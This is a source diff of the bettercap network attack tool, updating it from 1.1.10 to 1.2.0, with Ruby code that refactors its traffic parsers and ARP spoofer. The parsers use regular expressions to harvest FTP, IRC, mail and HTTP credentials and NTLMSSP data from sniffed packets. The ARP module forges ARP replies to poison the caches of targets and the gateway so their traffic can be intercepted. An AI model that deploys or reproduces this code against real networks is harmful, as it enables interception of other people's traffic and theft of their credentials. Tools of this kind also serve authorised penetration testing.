bettercap 1.1.10 → 1.2.0

data/lib/bettercap/proxy/thread_pool.rb

@@ -11,9 +11,10 @@ This project is released under the GPL 3 license.
 =end
 require 'thread'
 
-# Tnx to Puma ThreadPool!
 module BetterCap
 module Proxy
+# Thread pool class used by the BetterCap::Proxy::Proxy.
+# Tnx to Puma ThreadPool!
 class ThreadPool
 
   # Maintain a minimum of +min+ and maximum of +max+ threads
@@ -21,7 +22,6 @@ class ThreadPool
   #
   # The block passed is the work that will be performed in each
   # thread.
-  #
   def initialize(min, max, *extra, &block)
     @not_empty = ConditionVariable.new
     @not_full = ConditionVariable.new
@@ -46,12 +46,10 @@ class ThreadPool
     @mutex.synchronize do
       @min.times { spawn_thread }
     end
-
-    @clean_thread_locals = false
   end
 
-  attr_reader :spawned, :trim_requested
-  attr_accessor :clean_thread_locals
+  # Number of spawned threads in the pool.
+  attr_reader :spawned
 
   # How many objects have yet to be processed by the pool?
   #
@@ -104,12 +102,6 @@ class ThreadPool
 
         break unless continue
 
-        if @clean_thread_locals
-          Thread.current.keys.each do |key|
-            Thread.current[key] = nil unless key == :__recursive_key__
-          end
-        end
-
         begin
           block.call(work, *extra)
         rescue Exception
@@ -184,7 +176,7 @@ class ThreadPool
 
   # Tell all threads in the pool to exit and wait for them to finish.
   #
-  def shutdown
+  def shutdown( join_threads = true )
     threads = @mutex.synchronize do
       @shutdown = true
       @not_empty.broadcast
@@ -193,7 +185,7 @@ class ThreadPool
       @workers.dup
     end
 
-    threads.each(&:join)
+    threads.each(&:join) if join_threads
 
     @spawned = 0
     @workers = []

data/lib/bettercap/shell.rb

@@ -8,10 +8,11 @@ This project is released under the GPL 3 license.
 require 'bettercap/error'
 
 module BetterCap
+# Class responsible of executing various shell commands.
 module Shell
   class << self
-
-    #return the output of command
+    # Execute +command+ and return its output.
+    # Raise +BetterCap::Error+ if the return code is not 0.
     def execute(command)
       r = ''
       10.times do
@@ -29,14 +30,15 @@ module Shell
       r
     end
 
+    # Get the +iface+ network interface configuration.
     def ifconfig(iface = '')
       self.execute( "LANG=en && ifconfig #{iface}" )
     end
 
+    # Get the ARP table cached on this computer.
     def arp
       self.execute( 'LANG=en && arp -a -n' )
     end
-
   end
 end
 end

data/lib/bettercap/sniffer/parsers/base.rb

@@ -10,12 +10,17 @@ This project is released under the GPL 3 license.
 
 =end
 module BetterCap
-class BaseParser
+module Parsers
+# Base class for BetterCap::Parsers.
+class Base
+  # Initialize this parser.
   def initialize
     @filters = []
     @name = 'BASE'
   end
 
+  # This method will be called from the BetterCap::Sniffer for each
+  # incoming packet ( +pkt ) and will apply the parser filter to it.
   def on_packet( pkt )
     s = pkt.to_s
     @filters.each do |filter|
@@ -26,3 +31,4 @@ class BaseParser
   end
 end
 end
+end

data/lib/bettercap/sniffer/parsers/custom.rb

@@ -12,10 +12,15 @@ This project is released under the GPL 3 license.
 require 'bettercap/sniffer/parsers/base'
 
 module BetterCap
-class CustomParser < BaseParser
+module Parsers
+# Parser used when the "--custom-parser EXPRESSION" command line
+# argument is specified.
+class Custom < Base
+  # Initialize the parser given the +filter+ Regexp object.
   def initialize( filter )
     @filters = [ filter ]
     @name    = 'DATA'
   end
 end
 end
+end

data/lib/bettercap/sniffer/parsers/ftp.rb

@@ -12,10 +12,13 @@ This project is released under the GPL 3 license.
 require 'bettercap/sniffer/parsers/base'
 
 module BetterCap
-class FtpParser < BaseParser
-    def initialize
-        @filters = [ /(USER|PASS)\s+.+/ ]
-        @name = 'FTP'
-    end
+module Parsers
+# FTP authentication parser.
+class Ftp < Base
+  def initialize
+    @filters = [ /(USER|PASS)\s+.+/ ]
+    @name = 'FTP'
+  end
+end
 end
 end

data/lib/bettercap/sniffer/parsers/httpauth.rb

@@ -14,7 +14,9 @@ require 'colorize'
 require 'base64'
 
 module BetterCap
-class HttpauthParser < BaseParser
+module Parsers
+# HTTP basic and digest authentication parser.  
+class Httpauth < Base
   def on_packet( pkt )
     lines = pkt.to_s.split("\n")
     hostname = nil
@@ -41,3 +43,4 @@ class HttpauthParser < BaseParser
   end
 end
 end
+end

data/lib/bettercap/sniffer/parsers/https.rb

@@ -14,7 +14,9 @@ require 'colorize'
 require 'resolv'
 
 module BetterCap
-class HttpsParser < BaseParser
+module Parsers
+# HTTPS connections parser.    
+class Https < Base
   @@prev = nil
 
   def on_packet( pkt )
@@ -39,3 +41,4 @@ class HttpsParser < BaseParser
   end
 end
 end
+end

data/lib/bettercap/sniffer/parsers/irc.rb

@@ -12,10 +12,13 @@ This project is released under the GPL 3 license.
 require 'bettercap/sniffer/parsers/base'
 
 module BetterCap
-class IrcParser < BaseParser
-    def initialize
-        @filters = [ /NICK\s+.+/, /NS IDENTIFY\s+.+/, /nickserv :identify\s+.+/ ]
-        @name = 'IRC'
-    end
+module Parsers
+# IRC protocol parser.
+class Irc < Base
+  def initialize
+    @filters = [ /NICK\s+.+/, /NS IDENTIFY\s+.+/, /nickserv :identify\s+.+/ ]
+    @name = 'IRC'
+  end
+end
 end
 end

data/lib/bettercap/sniffer/parsers/mail.rb

@@ -12,10 +12,13 @@ This project is released under the GPL 3 license.
 require 'bettercap/sniffer/parsers/base'
 
 module BetterCap
-class MailParser < BaseParser
-    def initialize
-        @filters = [ /(\d+ )?(auth|authenticate) ([a-z\-_0-9]+)/i ]
-        @name = 'MAIL'
-    end
+module Parsers
+# POP/IMAP authentication parser.  
+class Mail < Base
+  def initialize
+    @filters = [ /(\d+ )?(auth|authenticate) ([a-z\-_0-9]+)/i ]
+    @name = 'MAIL'
+  end
+end
 end
 end

data/lib/bettercap/sniffer/parsers/ntlmss.rb

@@ -13,26 +13,29 @@ require 'bettercap/sniffer/parsers/base'
 require 'colorize'
 
 module BetterCap
-class NtlmssParser < BaseParser
-    def bin2hex( data )
-        hex = ''
-        data.each_byte do |byte|
-            if /[[:print:]]/ === byte.chr
-                hex += byte.chr
-            else
-                hex += "\\x" + byte.to_s(16)
-            end
-        end
-
-        hex
+module Parsers
+# NTLMSS traffic parser.
+class Ntlmss < Base
+  # Convert binary +data+ into human readable hexadecimal representation.
+  def bin2hex( data )
+    hex = ''
+    data.each_byte do |byte|
+      if /[[:print:]]/ === byte.chr
+        hex += byte.chr
+      else
+        hex += "\\x" + byte.to_s(16)
+      end
     end
+    hex
+  end
 
-    def on_packet( pkt )
-        s = pkt.to_s
-        if s =~ /NTLMSSP\x00\x03\x00\x00\x00.+/
-            # TODO: Parse NTLMSSP packet.
-            StreamLogger.log_raw( pkt, 'NTLMSS', bin2hex( pkt.payload ) )
-        end
+  def on_packet( pkt )
+    s = pkt.to_s
+    if s =~ /NTLMSSP\x00\x03\x00\x00\x00.+/
+      # TODO: Parse NTLMSSP packet.
+      StreamLogger.log_raw( pkt, 'NTLMSS', bin2hex( pkt.payload ) )
     end
+  end
+end
 end
 end

data/lib/bettercap/sniffer/parsers/post.rb

@@ -13,7 +13,9 @@ require 'bettercap/sniffer/parsers/base'
 require 'colorize'
 
 module BetterCap
-class PostParser < BaseParser
+module Parsers
+# HTTP POST requests parser.
+class Post < Base
   def on_packet( pkt )
     s = pkt.to_s
     if s =~ /POST\s+[^\s]+\s+HTTP.+/
@@ -22,3 +24,4 @@ class PostParser < BaseParser
   end
 end
 end
+end

data/lib/bettercap/sniffer/parsers/url.rb

@@ -13,7 +13,9 @@ require 'bettercap/sniffer/parsers/base'
 require 'colorize'
 
 module BetterCap
-class UrlParser < BaseParser
+module Parsers
+# HTTP GET requests parser.  
+class Url < Base
   def on_packet( pkt )
     s = pkt.to_s
     if s =~ /GET\s+([^\s]+)\s+HTTP.+Host:\s+([^\s]+).+/m
@@ -26,3 +28,4 @@ class UrlParser < BaseParser
   end
 end
 end
+end

data/lib/bettercap/sniffer/sniffer.rb

@@ -10,11 +10,12 @@ This project is released under the GPL 3 license.
 
 =end
 require 'bettercap/logger'
-require 'bettercap/factories/parser_factory'
 require 'colorize'
 require 'packetfu'
 
 module BetterCap
+# Class responsible of loading BetterCap::Parsers instances and performing
+# network packet sniffing and dumping.
 class Sniffer
   include PacketFu
 
@@ -23,6 +24,9 @@ class Sniffer
   @@pcap    = nil
   @@cap     = nil
 
+  # Start a new thread that will sniff packets from the network and pass
+  # each one of them to the BetterCap::Parsers instances loaded inside the
+  # +ctx+ BetterCap::Context instance.
   def self.start( ctx )
     Thread.new do
       Logger.info 'Starting sniffer ...'
@@ -94,9 +98,9 @@ class Sniffer
     end
 
     if @@ctx.options.custom_parser.nil?
-      @@parsers = ParserFactory.load_by_names @@ctx.options.parsers
+      @@parsers = Factories::Parser.load_by_names @@ctx.options.parsers
     else
-      @@parsers = ParserFactory.load_custom @@ctx.options.custom_parser
+      @@parsers = Factories::Parser.load_custom @@ctx.options.custom_parser
     end
 
     @@cap = Capture.new(

data/lib/bettercap/spoofers/arp.rb

@@ -9,15 +9,18 @@ Blog   : http://www.evilsocket.net/
 This project is released under the GPL 3 license.
 
 =end
+require 'bettercap/spoofers/base'
 require 'bettercap/error'
 require 'bettercap/context'
-require 'bettercap/base/ispoofer'
 require 'bettercap/network'
 require 'bettercap/logger'
 require 'colorize'
 
 module BetterCap
-class ArpSpoofer < ISpoofer
+module Spoofers
+# This class is responsible of performing ARP spoofing on the network.
+class Arp < Base
+  # Initialize the BetterCap::Spoofers::Arp object.
   def initialize
     @ctx          = Context.get
     @gateway      = nil
@@ -27,16 +30,12 @@ class ArpSpoofer < ISpoofer
     @capture      = nil
     @running      = false
 
-    Logger.info "Getting gateway #{@ctx.gateway} MAC address ..."
-
-    hw = Network.get_hw_address( @ctx.ifconfig, @ctx.gateway )
-    raise BetterCap::Error, "Couldn't determine router MAC" if hw.nil?
-
-    @gateway = Target.new( @ctx.gateway, hw )
-
-    Logger.info "  #{@gateway}"
+    update_gateway!
   end
 
+  # Send a spoofed ARP reply to the target identified by the +daddr+ IP address
+  # and +dmac+ MAC address, spoofing the +saddr+ IP address and +smac+ MAC
+  # address as the source device.
   def send_spoofed_packet( saddr, smac, daddr, dmac )
     pkt = PacketFu::ARPPacket.new
     pkt.eth_saddr = smac
@@ -47,9 +46,10 @@ class ArpSpoofer < ISpoofer
     pkt.arp_daddr_ip = daddr
     pkt.arp_opcode = 2
 
-    pkt.to_w(@ctx.ifconfig[:iface])
+    @ctx.packets.push(pkt)
   end
 
+  # Start the ARP spoofing.
   def start
     Logger.info "Starting ARP spoofer ( #{@ctx.options.half_duplex ? 'Half' : 'Full'} Duplex ) ..."
 
@@ -58,89 +58,11 @@ class ArpSpoofer < ISpoofer
 
     @ctx.firewall.enable_forwarding(true) unless @forwarding
 
-    @sniff_thread = Thread.new do
-      Logger.info 'ARP watcher started ...'
-      begin
-        @capture = PacketFu::Capture.new(
-            iface: @ctx.options.iface,
-            filter: 'arp',
-            start: true
-        )
-      rescue  Exception => e
-        Logger.error e.message
-      end
-
-      @capture.stream.each do |p|
-        begin
-          pkt = PacketFu::Packet.parse p
-          # we're only interested in 'who-has' packets
-          if pkt.arp_opcode == 1 and pkt.arp_dst_mac.to_s == '00:00:00:00:00:00'
-            is_from_us = ( pkt.arp_src_ip.to_s == @ctx.ifconfig[:ip_saddr] )
-            unless is_from_us
-              Logger.info "[ARP] #{pkt.arp_src_ip.to_s} is asking who #{pkt.arp_dst_ip.to_s} is."
-
-              send_spoofed_packet pkt.arp_dst_ip.to_s, @ctx.ifconfig[:eth_saddr], pkt.arp_src_ip.to_s, pkt.arp_src_mac.to_s
-            end
-          end
-        rescue Exception => e
-          Logger.error e.message
-        end
-      end
-    end
-
-    @spoof_thread = Thread.new do
-      prev_size = @ctx.targets.size
-      loop do
-        if not @running
-            Logger.debug 'Stopping spoofing thread ...'
-            Thread.exit
-            break
-        end
-
-        size = @ctx.targets.size
-
-        if size > prev_size
-          Logger.warn "Aquired #{size - prev_size} new targets."
-        elsif size < prev_size
-          Logger.warn "Lost #{prev_size - size} targets."
-        end
-
-        Logger.debug "Spoofing #{@ctx.targets.size} targets ..."
-
-        @ctx.targets.each do |target|
-          # targets could change, update mac addresses if needed
-          if target.mac.nil?
-            hw = Network.get_hw_address( @ctx.ifconfig, target.ip )
-            if hw.nil?
-              Logger.warn "Couldn't determine target #{ip} MAC!"
-              next
-            else
-              Logger.info "  Target MAC    : #{hw}"
-              target.mac = hw
-            end
-          # target was specified by MAC address
-          elsif target.ip_refresh
-            ip = Network.get_ip_address( @ctx, target.mac )
-            if ip.nil?
-              Logger.warn "Couldn't determine target #{target.mac} IP!"
-              next
-            else
-              Logger.info "Target #{target.mac} IP : #{ip}" if target.ip.nil? or target.ip != ip
-              target.ip = ip
-            end
-          end
-
-          send_spoofed_packet( @gateway.ip, @ctx.ifconfig[:eth_saddr], target.ip, target.mac )
-          send_spoofed_packet( target.ip, @ctx.ifconfig[:eth_saddr], @gateway.ip, @gateway.mac ) unless @ctx.options.half_duplex
-        end
-
-        prev_size = @ctx.targets.size
-
-        sleep(1)
-      end
-    end
+    @sniff_thread = Thread.new { arp_watcher }
+    @spoof_thread = Thread.new { arp_spoofer }
   end
 
+  # Stop the ARP spoofing, reset firewall state and restore targets ARP table.
   def stop
     raise 'ARP spoofer is not running' unless @running
 
@@ -158,14 +80,67 @@ class ArpSpoofer < ISpoofer
     Logger.info "Restoring ARP table of #{@ctx.targets.size} targets ..."
 
     @ctx.targets.each do |target|
-      unless target.mac.nil?
+      unless target.ip.nil? or target.mac.nil?
         begin
           send_spoofed_packet( @gateway.ip, @gateway.mac, target.ip, target.mac )
           send_spoofed_packet( target.ip, target.mac, @gateway.ip, @gateway.mac ) unless @ctx.options.half_duplex
         rescue; end
       end
     end
-    sleep 1
   end
+
+  private
+
+  def update_targets!
+    @ctx.targets.each do |target|
+      # targets could change, update mac addresses if needed
+      if target.mac.nil?
+        hw = Network.get_hw_address( @ctx.ifconfig, target.ip )
+        if hw.nil?
+          Logger.warn "Couldn't determine target #{ip} MAC!"
+          next
+        else
+          Logger.info "  Target MAC    : #{hw}"
+          target.mac = hw
+        end
+      # target was specified by MAC address
+      elsif target.ip_refresh
+        ip = Network.get_ip_address( @ctx, target.mac )
+        if ip.nil?
+          Logger.warn "Couldn't determine target #{target.mac} IP!"
+          next
+        else
+          Logger.info "Target #{target.mac} IP : #{ip}" if target.ip.nil? or target.ip != ip
+          target.ip = ip
+        end
+      end
+    end
+  end
+
+  def arp_spoofer
+    spoof_loop(1) { |target|
+      unless target.ip.nil? or target.mac.nil?
+        send_spoofed_packet( @gateway.ip, @ctx.ifconfig[:eth_saddr], target.ip, target.mac )
+        send_spoofed_packet( target.ip, @ctx.ifconfig[:eth_saddr], @gateway.ip, @gateway.mac ) unless @ctx.options.half_duplex
+      end
+    }
+  end
+
+  def arp_watcher
+    Logger.info 'ARP watcher started ...'
+
+    sniff_packets('arp') { |pkt|
+      # we're only interested in 'who-has' packets
+      if pkt.arp_opcode == 1 and pkt.arp_dst_mac.to_s == '00:00:00:00:00:00'
+        is_from_us = ( pkt.arp_src_ip.to_s == @ctx.ifconfig[:ip_saddr] )
+        unless is_from_us
+          Logger.info "[ARP] #{pkt.arp_src_ip.to_s} is asking who #{pkt.arp_dst_ip.to_s} is."
+
+          send_spoofed_packet pkt.arp_dst_ip.to_s, @ctx.ifconfig[:eth_saddr], pkt.arp_src_ip.to_s, pkt.arp_src_mac.to_s
+        end
+      end
+    }
+  end
+end
 end
 end